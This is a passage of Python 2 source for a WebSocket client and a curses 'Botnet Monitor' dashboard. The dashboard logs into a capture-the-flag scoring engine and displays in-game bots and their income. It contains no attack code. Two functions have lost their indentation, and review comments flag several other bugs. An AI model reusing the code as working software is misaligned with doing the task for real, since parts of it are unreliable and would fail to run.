    timeout: socket timeout in seconds; None means "use default_timeout".
    options: "header" (custom HTTP headers) and "sockopt" (setsockopt tuples).
    """
    sockopt = options.get("sockopt", ())
    websock = WebSocket(sockopt=sockopt)
    # Bug fix: the original `timeout is not None and timeout or default_timeout`
    # expression fell back to default_timeout whenever timeout == 0.
    actual_timeout = timeout if timeout is not None else default_timeout
    # Bug fix: guard the log line — "%d" % None raised TypeError when neither
    # a timeout argument nor a global default had been set.
    if actual_timeout is not None:
        logging.info("[Socket] Timeout: %d" % actual_timeout)
    websock.settimeout(actual_timeout)
    websock.connect(url, **options)
    return websock
# Largest value representable in 32 bits.
_MAX_INTEGER = (1 << 32) - 1
# Printable-ASCII ranges allowed in a key.
# NOTE(review): concatenating two range() results is Python 2 only — on
# Python 3 this line raises TypeError at import time.
_AVAILABLE_KEY_CHARS = range(0x21, 0x2F + 1) + range(0x3A, 0x7E + 1)
# Largest single-byte value.
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
# Response headers that must be present (with these values, compared
# lowercased) for the handshake response to be considered valid.
_HEADERS_TO_CHECK = {"upgrade": "websocket", "connection": "upgrade"}


class _SSLSocketWrapper(object):
    # Minimal recv/send adapter over an SSL channel so io_sock keeps a
    # socket-like interface for wss:// connections.
    # NOTE(review): socket.ssl() is a legacy Python 2 API, removed in
    # Python 3 — the ssl module is its modern replacement; confirm target
    # interpreter before porting.
    def __init__(self, sock):
        self.ssl = socket.ssl(sock)

    def recv(self, bufsize):
        return self.ssl.read(bufsize)

    def send(self, payload):
        return self.ssl.write(payload)
_BOOL_VALUES = (0, 1)
def _is_bool(*values):
for v in values:
if v not in _BOOL_VALUES:
return False
return True
class ABNF(object):
    """
    ABNF frame class.
    see http://tools.ietf.org/html/rfc5234
    and http://tools.ietf.org/html/rfc6455#section-5.2

    NOTE: this implementation uses Python 2 byte-string idioms throughout
    (chr() concatenation, unicode, xrange, array.tostring).
    """

    # operation code values.
    OPCODE_TEXT = 0x1
    OPCODE_BINARY = 0x2
    OPCODE_CLOSE = 0x8
    OPCODE_PING = 0x9
    OPCODE_PONG = 0xA
    # available operation code value tuple
    OPCODES = (OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)
    # opcode human readable string
    OPCODE_MAP = {
        OPCODE_TEXT: "text",
        OPCODE_BINARY: "binary",
        OPCODE_CLOSE: "close",
        OPCODE_PING: "ping",
        OPCODE_PONG: "pong",
    }
    # data length thresholds (RFC 6455 section 5.2).
    LENGTH_7 = 0x7D  # max payload encodable in the 7-bit length field
    LENGTH_16 = 1 << 16  # below this, the 16-bit extended field is used
    LENGTH_63 = 1 << 63  # protocol hard limit (64-bit length, MSB must be 0)

    def __init__(
        self, fin=0, rsv1=0, rsv2=0, rsv3=0, opcode=OPCODE_TEXT, mask=1, data=""
    ):
        """
        Constructor for ABNF.
        please check RFC for arguments.
        """
        self.fin = fin
        self.rsv1 = rsv1
        self.rsv2 = rsv2
        self.rsv3 = rsv3
        self.opcode = opcode
        self.mask = mask
        self.data = data
        # Default mask-key source: 4 random bytes per frame from the OS.
        self.get_mask_key = os.urandom

    @staticmethod
    def create_frame(data, opcode):
        """
        create frame to send text, binary and other data.
        data: data to send. This is string value(byte array).
            if opcode is OPCODE_TEXT and this value is unicode,
            data value is converted into utf-8 bytes, automatically.
        opcode: operation code. please see OPCODE_XXX.
        """
        # NOTE: `unicode` exists only on Python 2.
        if opcode == ABNF.OPCODE_TEXT and isinstance(data, unicode):
            data = data.encode("utf-8")
        # mask must be set if send data from client
        return ABNF(1, 0, 0, 0, opcode, 1, data)

    def format(self):
        """
        format this object to string(byte array) to send data to server.
        Raises ValueError for invalid flag bits, opcode, or oversize payload.
        """
        if not _is_bool(self.fin, self.rsv1, self.rsv2, self.rsv3):
            raise ValueError("not 0 or 1")
        if self.opcode not in ABNF.OPCODES:
            raise ValueError("Invalid OPCODE")
        length = len(self.data)
        if length >= ABNF.LENGTH_63:
            raise ValueError("data is too long")
        # First header byte: FIN | RSV1-3 | opcode.
        frame_header = chr(
            self.fin << 7
            | self.rsv1 << 6
            | self.rsv2 << 5
            | self.rsv3 << 4
            | self.opcode
        )
        # Second byte: mask bit + payload length, followed by the 16- or
        # 64-bit extended length field for larger payloads.
        if length < ABNF.LENGTH_7:
            frame_header += chr(self.mask << 7 | length)
        elif length < ABNF.LENGTH_16:
            frame_header += chr(self.mask << 7 | 0x7E)
            frame_header += struct.pack("!H", length)
        else:
            frame_header += chr(self.mask << 7 | 0x7F)
            frame_header += struct.pack("!Q", length)
        if not self.mask:
            return frame_header + self.data
        else:
            mask_key = self.get_mask_key(4)
            return frame_header + self._get_masked(mask_key)

    def _get_masked(self, mask_key):
        # Prepend the 4-byte mask key, then the XOR-masked payload.
        s = ABNF.mask(mask_key, self.data)
        return mask_key + "".join(s)

    @staticmethod
    def mask(mask_key, data):
        """
        mask or unmask data. Just do xor for each byte
        mask_key: 4 byte string(byte).
        data: data to mask/unmask.
        """
        # NOTE: xrange and array.tostring() are Python 2 only.
        _m = array.array("B", mask_key)
        _d = array.array("B", data)
        for i in xrange(len(_d)):
            _d[i] ^= _m[i % 4]
        return _d.tostring()
class WebSocket(object):
    """
    Low level WebSocket interface.
    This class is based on
    The WebSocket protocol draft-hixie-thewebsocketprotocol-76
    http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
    We can connect to the websocket server and send/receive data.
    The following example is a echo client.

    >>> import websocket
    >>> ws = websocket.WebSocket()
    >>> ws.connect("ws://echo.websocket.org")
    >>> ws.send("Hello, Server")
    >>> ws.recv()
    'Hello, Server'
    >>> ws.close()

    get_mask_key: a callable to produce new mask keys, see the set_mask_key
        function's docstring for more details
    sockopt: values for socket.setsockopt.
        sockopt must be tuple and each element is argument of sock.setsockopt.
    """

    def __init__(self, get_mask_key=None, sockopt=()):
        """
        Initialize WebSocket object.
        """
        self.connected = False
        # Assigned externally (see WebSocketApp.run_forever) so that the
        # pong handler can flag the UI; None until then.
        self.monitor = None
        # io_sock is replaced by an SSL wrapper for wss:// connections;
        # sock stays the raw socket for timeout/shutdown control.
        self.io_sock = self.sock = socket.socket()
        for opts in sockopt:
            self.sock.setsockopt(*opts)
        self.get_mask_key = get_mask_key

    def set_mask_key(self, func):
        """
        set function to create mask key. You can customize mask key generator.
        Mainly, this is for testing purpose.
        func: callable object. the func must take 1 integer argument,
            the length of the mask key, and return a string(byte array)
            of that length.
        """
        self.get_mask_key = func

    def settimeout(self, timeout):
        """
        Set the timeout to the websocket.
        timeout: timeout time(second).
        """
        self.sock.settimeout(timeout)

    def gettimeout(self):
        """
        Get the websocket timeout(second).
        """
        return self.sock.gettimeout()

    def connect(self, url, **options):
        """
        Connect to url. url is websocket url scheme. ie. ws://host:port/resource
        You can customize using 'options'.
        If you set "header" dict object, you can set your own custom header.

        >>> ws = WebSocket()
        >>> ws.connect("ws://echo.websocket.org/",
        ...     header={"User-Agent: MyProgram",
        ...             "x-custom: header"})

        timeout: socket timeout time. This value is integer.
            if you set None for this value,
            it means "use default_timeout value"
        options: current support option is only "header".
            if you set header as dict value,
            the custom HTTP headers are added.
        """
        hostname, port, resource, is_secure = _parse_url(url)
        # TODO: we need to support proxy
        self.sock.connect((hostname, port))
        if is_secure:
            self.io_sock = _SSLSocketWrapper(self.sock)
        self._handshake(hostname, port, resource, **options)

    def _handshake(self, host, port, resource, **options):
        # Perform the client half of the RFC 6455 opening handshake:
        # send the Upgrade request, then validate the 101 response.
        sock = self.io_sock
        headers = []
        headers.append("GET %s HTTP/1.1" % resource)
        headers.append("Upgrade: websocket")
        headers.append("Connection: Upgrade")
        # Only include the port in the Host header for non-default ports.
        if port == 80:
            hostport = host
        else:
            hostport = "%s:%d" % (host, port)
        headers.append("Host: %s" % hostport)
        if "origin" in options:
            headers.append("Origin: %s" % options["origin"])
        else:
            headers.append("Origin: http://%s" % hostport)
        key = _create_sec_websocket_key()
        headers.append("Sec-WebSocket-Key: %s" % key)
        headers.append("Sec-WebSocket-Version: %s" % VERSION)
        if "header" in options:
            headers.extend(options["header"])
        # Two empty entries produce the CRLF CRLF terminating the request.
        headers.append("")
        headers.append("")
        header_str = "\r\n".join(headers)
        sock.send(header_str)
        if traceEnabled:
            logger.debug("--- request header ---")
            logger.debug(header_str)
            logger.debug("-----------------------")
        status, resp_headers = self._read_headers()
        if status != 101:
            self.close()
            raise WebSocketException("Handshake Status %d" % status)
        success = self._validate_header(resp_headers, key)
        if not success:
            self.close()
            raise WebSocketException("Invalid WebSocket Header")
        self.connected = True

    def _validate_header(self, headers, key):
        # Check the Upgrade/Connection response headers and verify the
        # Sec-WebSocket-Accept value (base64 SHA1 of key + RFC 6455 GUID).
        # NOTE: dict.iteritems() and base64.encodestring are Python 2 only.
        for k, v in _HEADERS_TO_CHECK.iteritems():
            r = headers.get(k, None)
            if not r:
                return False
            r = r.lower()
            if v != r:
                return False
        result = headers.get("sec-websocket-accept", None)
        if not result:
            return False
        result = result.lower()
        value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
        hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
        return hashed == result

    def _read_headers(self):
        # Read the HTTP response status line and header lines; returns
        # (status_code, {lowercased name: lowercased value}).
        status = None
        headers = {}
        if traceEnabled:
            logger.debug("--- response header ---")
        while True:
            line = self._recv_line()
            if line == "\r\n":
                break  # blank line ends the header section
            line = line.strip()
            if traceEnabled:
                logger.debug(line)
            if not status:
                # First line is the status line, e.g. "HTTP/1.1 101 ...".
                status_info = line.split(" ", 2)
                status = int(status_info[1])
            else:
                kv = line.split(":", 1)
                if len(kv) == 2:
                    key, value = kv
                    headers[key.lower()] = value.strip().lower()
                else:
                    raise WebSocketException("Invalid header")
        if traceEnabled:
            logger.debug("-----------------------")
        return status, headers

    def send(self, payload, opcode=ABNF.OPCODE_TEXT):
        """
        Send the data as string.
        payload: Payload must be utf-8 string or unicode,
            if the opcode is OPCODE_TEXT.
            Otherwise, it must be string(byte array)
        opcode: operation code to send. Please see OPCODE_XXX.
        """
        frame = ABNF.create_frame(payload, opcode)
        if self.get_mask_key:
            frame.get_mask_key = self.get_mask_key
        data = frame.format()
        # Loop because socket.send may accept only part of the buffer.
        while data:
            l = self.io_sock.send(data)
            data = data[l:]
        if traceEnabled:
            # NOTE(review): `data` has been fully consumed by the loop above,
            # so this always logs an empty string; the formatted frame was
            # probably intended here.
            logger.debug("send: " + repr(data))

    def ping(self, payload=""):
        """
        send ping data.
        payload: data payload to send server.
        """
        logging.debug("Got <- PING")
        self.send(payload, ABNF.OPCODE_PING)

    def pong(self, payload):
        """
        send pong data (the reply to a server ping).
        payload: data payload to send server.
        """
        logging.debug("Sending -> PONG")
        # Flag the UI so the status bar can flash; assumes self.monitor was
        # assigned before traffic arrives — TODO confirm callers guarantee it.
        self.monitor.pong = True
        self.send(payload, ABNF.OPCODE_PONG)

    def recv(self):
        """
        Receive string data(byte array) from the server.
        return value: string(byte array) value, or None on a close frame.
        """
        opcode, data = self.recv_data()
        return data

    def recv_data(self):
        """
        Receive data with operation code.
        return value: tuple of operation code and string(byte array) value.
        """
        while True:
            frame = self.recv_frame()
            if not frame:
                # handle error:
                # 'NoneType' object has no attribute 'opcode'
                raise WebSocketException("Not a valid frame %s" % frame)
            elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
                return (frame.opcode, frame.data)
            elif frame.opcode == ABNF.OPCODE_CLOSE:
                # Echo the close handshake and surface (opcode, None).
                self.send_close()
                return (frame.opcode, None)
            elif frame.opcode == ABNF.OPCODE_PING:
                # Answer pings transparently and keep waiting for data.
                self.pong(frame.data)

    def recv_frame(self):
        """
        receive data as frame from server.
        return value: ABNF frame object.
        """
        # First two header bytes: flags/opcode and mask-bit/length.
        header_bytes = self._recv_strict(2)
        if not header_bytes:
            return None
        b1 = ord(header_bytes[0])
        fin = b1 >> 7 & 1
        rsv1 = b1 >> 6 & 1
        rsv2 = b1 >> 5 & 1
        rsv3 = b1 >> 4 & 1
        opcode = b1 & 0xF
        b2 = ord(header_bytes[1])
        mask = b2 >> 7 & 1
        length = b2 & 0x7F
        length_data = ""
        # 0x7E / 0x7F signal 16-bit and 64-bit extended length fields.
        if length == 0x7E:
            length_data = self._recv_strict(2)
            length = struct.unpack("!H", length_data)[0]
        elif length == 0x7F:
            length_data = self._recv_strict(8)
            length = struct.unpack("!Q", length_data)[0]
        mask_key = ""
        if mask:
            mask_key = self._recv_strict(4)
        data = self._recv_strict(length)
        if traceEnabled:
            received = header_bytes + length_data + mask_key + data
            logger.debug("recv: " + repr(received))
        if mask:
            data = ABNF.mask(mask_key, data)
        frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, mask, data)
        return frame

    def send_close(self, status=STATUS_NORMAL, reason=""):
        """
        send close data to the server.
        status: status code to send. see STATUS_XXX.
        reason: the reason to close. This must be string.
        """
        if status < 0 or status >= ABNF.LENGTH_16:
            raise ValueError("code is invalid range")
        self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)

    def close(self, status=STATUS_NORMAL, reason=""):
        """
        Close Websocket object
        status: status code to send. see STATUS_XXX.
        reason: the reason to close. This must be string.
        """
        if self.connected:
            if status < 0 or status >= ABNF.LENGTH_16:
                raise ValueError("code is invalid range")
            try:
                self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
                timeout = self.sock.gettimeout()
                # Wait at most 3s for the server's close frame, then restore
                # the caller's timeout before shutting down.
                self.sock.settimeout(3)
                try:
                    frame = self.recv_frame()
                    if logger.isEnabledFor(logging.ERROR):
                        recv_status = struct.unpack("!H", frame.data)[0]
                        if recv_status != STATUS_NORMAL:
                            logger.error("close status: " + repr(recv_status))
                except:
                    # Best effort: ignore errors while draining the close.
                    pass
                self.sock.settimeout(timeout)
                self.sock.shutdown(socket.SHUT_RDWR)
            except:
                # Best effort: the connection may already be gone.
                pass
        self._closeInternal()

    def _closeInternal(self):
        # Mark closed, release the socket, and drop the SSL wrapper (if any).
        self.connected = False
        self.sock.close()
        self.io_sock = self.sock

    def _recv(self, bufsize):
        # Read up to bufsize bytes; an empty read means the peer closed.
        bytes = self.io_sock.recv(bufsize)
        if not bytes:
            raise WebSocketConnectionClosedException()
        return bytes

    def _recv_strict(self, bufsize):
        # Keep reading until exactly bufsize bytes have been received.
        remaining = bufsize
        bytes = ""
        while remaining:
            bytes += self._recv(remaining)
            remaining = bufsize - len(bytes)
        return bytes

    def _recv_line(self):
        # Read one LF-terminated line, terminator included.
        line = []
        while True:
            c = self._recv(1)
            line.append(c)
            if c == "\n":
                break
        return "".join(line)
class WebSocketApp(object):
    """
    Higher level of APIs are provided.
    The interface is like JavaScript WebSocket object.
    """

    def __init__(
        self,
        url,
        header=None,
        on_open=None,
        on_message=None,
        on_error=None,
        on_close=None,
        keep_running=True,
        get_mask_key=None,
        sockopt=(),
    ):
        """
        url: websocket url.
        header: custom header for websocket handshake.
        on_open: callable object which is called at opening websocket.
            this function has one argument. The argument is this class object.
        on_message: callable object which is called when received data.
            on_message has 2 arguments: this class object and the utf-8
            string received from the server.
        on_error: callable object which is called when we get error.
            on_error has 2 arguments: this class object and the exception.
        on_close: callable object which is called when closed the connection.
            this function has one argument. The argument is this class object.
        keep_running: a boolean flag indicating whether the app's main loop
            should keep running, defaults to True
        get_mask_key: a callable to produce new mask keys, see the
            WebSocket.set_mask_key's docstring for more information
        """
        self.url = url
        self.header = header or []
        self.on_open = on_open
        self.on_message = on_message
        self.on_error = on_error
        self.on_close = on_close
        self.keep_running = keep_running
        self.get_mask_key = get_mask_key
        self.sock = None
        # Bug fix: run_forever() reads self.monitor, but the attribute was
        # never initialized here — callers had to assign ws.monitor
        # externally or hit AttributeError.  Default it to None.
        self.monitor = None

    def send(self, data, opcode=ABNF.OPCODE_TEXT):
        """
        send message.
        data: message to send. If you set opcode to OPCODE_TEXT, data must be
            utf-8 string or unicode.
        opcode: operation code of data. default is OPCODE_TEXT.
        """
        # NOTE(review): WebSocket.send() returns None, so this guard can
        # never fire; kept for interface compatibility.
        if self.sock.send(data, opcode) == 0:
            raise WebSocketConnectionClosedException()

    def close(self):
        """
        close websocket connection.
        """
        self.keep_running = False
        self.sock.close()

    def run_forever(self, sockopt=()):
        """
        run event loop for WebSocket framework.
        This loop is infinite loop and is alive during websocket is available.
        sockopt: values for socket.setsockopt.
            sockopt must be tuple and each element is argument of
            sock.setsockopt.
        """
        if self.sock:
            raise WebSocketException("socket is already opened")
        try:
            self.sock = WebSocket(self.get_mask_key, sockopt=sockopt)
            self.sock.settimeout(getdefaulttimeout())
            self.sock.connect(self.url, header=self.header)
            self.sock.monitor = self.monitor
            self._run_with_no_err(self.on_open)
            while self.keep_running:
                data = self.sock.recv()
                if data is None:
                    break  # server sent a close frame
                self._run_with_no_err(self.on_message, data)
        except KeyboardInterrupt:
            pass  # Just close and exit
        except Exception as e:
            self._run_with_no_err(self.on_error, e)
        finally:
            # Bug fix: guard against self.sock being None when WebSocket
            # construction itself raised, which previously triggered a
            # second AttributeError from inside this finally block.
            if self.sock is not None:
                self.sock.close()
            self._run_with_no_err(self.on_close)
            self.sock = None

    def _run_with_no_err(self, callback, *args):
        # Invoke an optional user callback, logging (never propagating)
        # any exception it raises.
        if callback:
            try:
                callback(self, *args)
            except Exception as err:
                if logger.isEnabledFor(logging.DEBUG):
                    logger.error(err)
###################
# > Time to Str
###################
def current_time():
    """Return the current local time formatted as HH:MM:SS."""
    return "{:%H:%M:%S}".format(datetime.now())
###################
# > Opcodes
###################
def stop_animate_thread(ws):
    """Signal the animation thread to stop and block until it has exited."""
    logging.info("Waiting for animation thread to exit ...")
    monitor = ws.monitor
    monitor.stop_thread = True
    worker = monitor.animate_thread
    if worker is not None:
        worker.join()
    logging.info("All threads have joined")
    monitor.animate_thread = None
    monitor.stop_thread = False


def update(ws, message):
    """Handle an 'update' opcode: redraw the grid with the latest bot list."""
    logging.debug("Got update: %s" % message)
    bots = [
        (bot["box_name"], bot["remote_ip"], bot["total_reward"])
        for bot in message["bots"]
    ]
    ws.monitor.update_grid(bots)


def auth_failure(ws, message):
    """Handle 'auth_failure': halt animation and show the access-denied UI."""
    stop_animate_thread(ws)
    logging.info("Authentication failure")
    ws.monitor.auth_failure("ACCESS DENIED")


def auth_success(ws, message):
    """Handle 'auth_success': start the progress animation and draw the UI."""
    stop_animate_thread(ws)
    logging.info("Successfully authenticated")
    worker = threading.Thread(target=ws.monitor.progress)
    worker.start()
    ws.monitor.animate_thread = worker
    ws.monitor.__interface__()


def ping(ws, message):
    """Handle a 'ping' opcode: flag the monitor so the status bar flashes."""
    ws.monitor.pong = True


# Opcode name -> handler dispatch table used by on_message().
OPCODES = {
    "update": update,
    "auth_success": auth_success,
    "auth_failure": auth_failure,
    "ping": ping,
}
###################
# > WS Callbacks
###################
def on_open(ws):
    """Send the authentication message as soon as the socket is open."""
    logging.info("Sending credentials to engine")
    credentials = {
        "opcode": "auth",
        "handle": ws.agent_name,
        "password": ws.password,
    }
    ws.send(json.dumps(credentials))
    ws.monitor.stop_thread = False
def on_message(ws, message):
    """Decode a JSON message and dispatch it to the matching opcode handler.

    Any malformed message (bad JSON, missing or unknown opcode) closes the
    connection.
    """
    logging.debug("Recv'd message: %s" % str(message))
    try:
        response = json.loads(message)
        if "opcode" not in response:
            raise ValueError("Missing opcode")
        if response["opcode"] not in OPCODES:
            raise ValueError("Invalid opcode")
        OPCODES[response["opcode"]](ws, response)
    except ValueError:
        ws.close()
def on_error(ws, error):
    """Log a websocket error, halt the animation, and shut the monitor down."""
    logging.exception("[WebSocket] on_error - %s" % type(error))
    stop_animate_thread(ws)
    # Both socket-level and websocket-level failures show the same
    # connection-problem screen before exiting.
    if isinstance(error, (socket.error, WebSocketException)):
        ws.monitor.connection_problems()
    ws.monitor.stop()
def on_close(ws):
    """ Websocket closed: stop the animation thread and exit the UI. """
    logging.debug("[WebSocket] Closing connection.")
    stop_animate_thread(ws)
    # BotMonitor.stop() tears down curses and calls os._exit(0).
    ws.monitor.stop("Connection lost")
###################
# > Bot Monitor
###################
class BotMonitor(object):
    """ Manages all flags and state changes for the curses botnet monitor UI.

    NOTE: written for Python 2 — the many `/ 2` centering divisions are
    integer there but produce floats on Python 3, which curses rejects.
    """

    def __init__(self, connection_url):
        self.url = connection_url  # ws:// or wss:// scoring-engine URL
        self.agent_name = None  # account name, prompted for in __credentials__
        self.password = None  # password, prompted for in __credentials__
        self.total_income = 0  # running sum of all reported bot rewards
        self.animate_thread = None  # currently running animation thread
        self.pong = False  # set when a ping/pong is seen; cleared by progress()

    def start(self):
        """ Initializes the screen """
        self.screen = curses.initscr()
        self.__clear__()
        curses.start_color()
        curses.use_default_colors()
        self.__colors__()
        curses.noecho()  # do not echo keystrokes
        curses.cbreak()  # react to keys without waiting for Enter
        curses.curs_set(0)  # hide the cursor
        self.max_y, self.max_x = self.screen.getmaxyx()
        self.screen.border(0)
        self.screen.refresh()
        self.__load__()
        self.__connect__()

    def stop(self, message=None):
        """ Gracefully exits the program """
        logging.debug("Stopping curses ui: %s" % message)
        self.__clear__()
        curses.endwin()
        # Hard exit: skips cleanup handlers and kills remaining threads.
        os._exit(0)

    def connection_problems(self):
        """ Display connection issue, and exit """
        logging.fatal("Connection failure!")
        self.auth_failure("CONNECTION FAILURE")

    def __connect__(self):
        """ Connect and authenticate with scoring engine """
        ws = WebSocketApp(
            self.url, on_message=on_message, on_error=on_error, on_close=on_close
        )
        # The module-level callbacks reach back into this monitor via
        # ws.monitor and read the credentials gathered in __credentials__.
        ws.monitor = self
        ws.agent_name = self.agent_name
        ws.password = self.password
        ws.on_open = on_open
        self.animate_thread = threading.Thread(target=self.__connecting__)
        self.stop_thread = False
        self.animate_thread.start()
        ws.run_forever()  # blocks until the connection is closed

    def __connecting__(self):
        """ Display connecting animation (runs in its own thread) """
        self.__clear__()
        self.screen.refresh()
        prompt = " Connecting, please wait ..."
        connecting = curses.newwin(
            3, len(prompt) + 2, (self.max_y / 2) - 1, ((self.max_x - len(prompt)) / 2)
        )
        connecting.clear()
        connecting.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN))
        connecting.refresh()
        time.sleep(0.25)
        # Blink the prompt until stop_thread is raised.
        while not self.stop_thread:
            connecting.addstr(1, 1, " " * len(prompt))
            connecting.refresh()
            time.sleep(0.15)
            connecting.addstr(
                1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN)
            )
            connecting.refresh()
            time.sleep(0.25)
        # NOTE(review): curses window objects have no endwin() method —
        # this line raises AttributeError inside the animation thread when
        # the loop ends; confirm whether curses.endwin() or delwin() was
        # intended.
        connecting.endwin()

    def __load__(self):
        """ Loads all required data """
        self.load_message = " Loading, please wait ... "
        self.loading_bar = curses.newwin(
            3,
            len(self.load_message) + 2,
            (self.max_y / 2) - 1,
            ((self.max_x - len(self.load_message)) / 2),
        )
        self.loading_bar.border(0)
        self.loading_bar.addstr(1, 1, self.load_message, curses.A_BOLD)
        self.loading_bar.refresh()
        time.sleep(0.5)
        self.__credentials__()
        self.loading_bar.clear()

    def __interface__(self):
        """ Main interface loop: redraw the frame, title and grid """
        self.__redraw__()
        self.screen.nodelay(1)  # make input non-blocking
        self.__title__()
        self.__grid__()
        self.__positions__()
        self.screen.refresh()

    def __title__(self):
        """ Create title and footer """
        title = " Root the Box: Botnet Monitor "
        start_x = (self.max_x - len(title)) / 2
        self.screen.addstr(
            0, start_x, title, curses.A_BOLD | curses.color_pair(self.BLUE)
        )
        self.screen.addstr(0, start_x - 1, "|", curses.A_BOLD)
        self.screen.addstr(0, start_x + len(title), "|", curses.A_BOLD)
        # Bottom bar
        display_time = "[ %s ]" % current_time()
        self.screen.addstr(
            self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
        )
        # Placeholder overwritten by progress() animation.
        self.screen.addstr(self.max_y - 1, 3, "[---]")

    def __grid__(self):
        """ Draws the grid layout (column headers and separators) """
        pos_x, pos_y = 3, 3
        self.screen.hline(2, 1, curses.ACS_HLINE, self.max_x - 2)
        self.screen.hline(4, 1, curses.ACS_HLINE, self.max_x - 2)
        # IP Address
        self.ip_title = " IP Address "
        self.screen.addstr(pos_y, 2, self.ip_title)
        self.screen.vline(
            pos_y, pos_x + len(self.ip_title), curses.ACS_VLINE, self.max_y - 4
        )
        # Box Name
        pos_x += len(self.ip_title)
        self.name_title = " Box Name "
        self.screen.addstr(pos_y, pos_x + 1, self.name_title)
        self.screen.vline(
            pos_y, pos_x + len(self.name_title) + 1, curses.ACS_VLINE, self.max_y - 4
        )
        # Bot Income
        pos_x += len(self.name_title)
        self.income_title = " Bot Income "
        self.screen.addstr(pos_y, pos_x + 2, self.income_title)

    def __positions__(self):
        """ Calculates starting x position for each column """
        self.start_ip_pos = 2
        self.start_name_pos = self.start_ip_pos + len(self.ip_title) + 3
        self.start_income_pos = self.start_name_pos + len(self.name_title) + 1

    def update_grid(self, boxes):
        """ Redraw the grid with updated box information.

        boxes: list of (box_name, remote_ip, total_reward) tuples — see
        update().  NOTE(review): box[0] (the name) is drawn in the
        "IP Address" column and box[1] (the ip) under "Box Name"; the
        columns look swapped — confirm intended.
        """
        self.__interface__()
        update_income = sum([box[2] for box in boxes])
        self.total_income += update_income
        self.__summary__(len(boxes), current_time())
        start_row = 5
        for index, box in enumerate(boxes):
            self.screen.addstr(
                start_row + index, self.start_ip_pos, "%d) %s" % (index + 1, box[0])
            )
            self.screen.addstr(start_row + index, self.start_name_pos, box[1])
            if 0 < float(update_income):
                # Each bot's share of this update's income, as a percentage.
                percent = (float(box[2]) / float(update_income)) * 100.0
                income_string = "$%d (%.02d%s)" % (box[2], percent, "%")
            else:
                income_string = "$%d" % (box[2],)
            self.screen.addstr(start_row + index, self.start_income_pos, income_string)
        self.screen.refresh()

    def __summary__(self, bot_count, update_time):
        """ Adds total bots and update time to the summary row """
        start_pos = 3
        pos_y = 1
        self.screen.addstr(
            pos_y, start_pos, "- Last Update: %s -" % update_time, curses.A_BOLD
        )
        bot_string = "$%d (%d bots)" % (self.total_income, bot_count)
        bot_pos = self.max_x - (len(bot_string) + 3)
        self.screen.addstr(pos_y, bot_pos, bot_string, curses.A_BOLD)

    def __colors__(self):
        """ Init colors pairs """
        self.NO_COLOR = -1  # use the terminal's default background
        self.RED = 1
        curses.init_pair(self.RED, curses.COLOR_RED, self.NO_COLOR)
        self.CYAN = 2
        curses.init_pair(self.CYAN, curses.COLOR_CYAN, self.NO_COLOR)
        self.WHITE_RED = 3
        curses.init_pair(self.WHITE_RED, curses.COLOR_WHITE, curses.COLOR_RED)
        self.BLUE = 4
        curses.init_pair(self.BLUE, curses.COLOR_BLUE, self.NO_COLOR)

    def __redraw__(self):
        """ Redraw the entire window """
        self.screen.clear()
        self.screen.border(0)
        self.screen.refresh()

    def __clear__(self):
        """ Clears the screen """
        self.screen.clear()
        self.screen.refresh()

    def __credentials__(self):
        """ Get display name and password from user """
        self.stop_thread = False
        thread = threading.Thread(target=self.__matrix__)
        self.loading_bar.clear()
        # Get agent name
        prompt = "Account: "
        self.agent_prompt = curses.newwin(
            3,
            len(self.load_message) + 2,
            (self.max_y / 2) - 1,
            ((self.max_x - len(self.load_message)) / 2),
        )
        self.agent_prompt.clear()
        self.agent_prompt.border(0)
        self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
        curses.echo()  # echo the account name as it is typed
        thread.start()
        self.agent_name = self.agent_prompt.getstr(
            1, len(prompt) + 1, len(self.load_message) - len(prompt) - 1
        )
        # Get password
        curses.noecho()  # but never echo the password
        prompt = "Password: "
        self.agent_prompt = curses.newwin(
            3,  # Height
            len(self.load_message) + 24,  # Width
            (self.max_y / 2) - 1,  # Start Y
            ((self.max_x - len(self.load_message)) / 2) - 12,  # Start X
        )
        self.agent_prompt.border(0)
        self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
        self.password = self.agent_prompt.getstr(1, len(prompt) + 1, 64)
        self.stop_thread = True
        thread.join()  # Wait for "Matrix" threads to stop

    def __matrix__(self):
        """ Displays really cool, pointless matrix like animation in the background.

        Each stage polls self.stop_thread so the credentials flow can
        cancel the animation early.
        """
        # (2) Sat com animation
        sat_com = " > Initializing sat com unit, please wait ... "
        progress = ["|", "/", "-", "\\"]
        for index in range(0, random.randint(50, 150)):
            self.screen.addstr(2, 2, sat_com + progress[index % 4])
            self.screen.refresh()
            time.sleep(0.1)
            if self.stop_thread:
                return
        self.screen.addstr(2, 2, sat_com + "success")
        self.screen.refresh()
        # (3) Uplink animation
        download = " > Establishing satellite uplink: "
        for index in range(5, 25):
            signal = random.randint(0, 30)
            self.screen.addstr(3, 2, download + str(signal) + " dBi ")
            self.screen.refresh()
            time.sleep(0.2)
            if self.stop_thread:
                return
        self.screen.addstr(3, 2, download + "locked on")
        self.screen.refresh()
        # (4) Downloading animation
        download = " > Downloading noki telcodes: "
        for index in range(0, 100):
            self.screen.addstr(4, 2, download + str(index) + "%")
            self.screen.refresh()
            time.sleep(0.1)
            if self.stop_thread:
                return
        self.screen.addstr(4, 2, download + "complete")
        self.screen.refresh()
        # (5) Initializing memory address
        memory = " > Initializing memory: "
        # NOTE: xrange is Python 2 only.
        for index in xrange(0, 2 ** 32, 2 ** 20):
            time.sleep(0.02)
            self.screen.addstr(5, 2, memory + str("0x%08X" % index))
            self.screen.refresh()
            if self.stop_thread:
                return
        self.screen.addstr(5, 2, memory + str("0x%08X -> 0xFFFFFFFF" % (0,)))
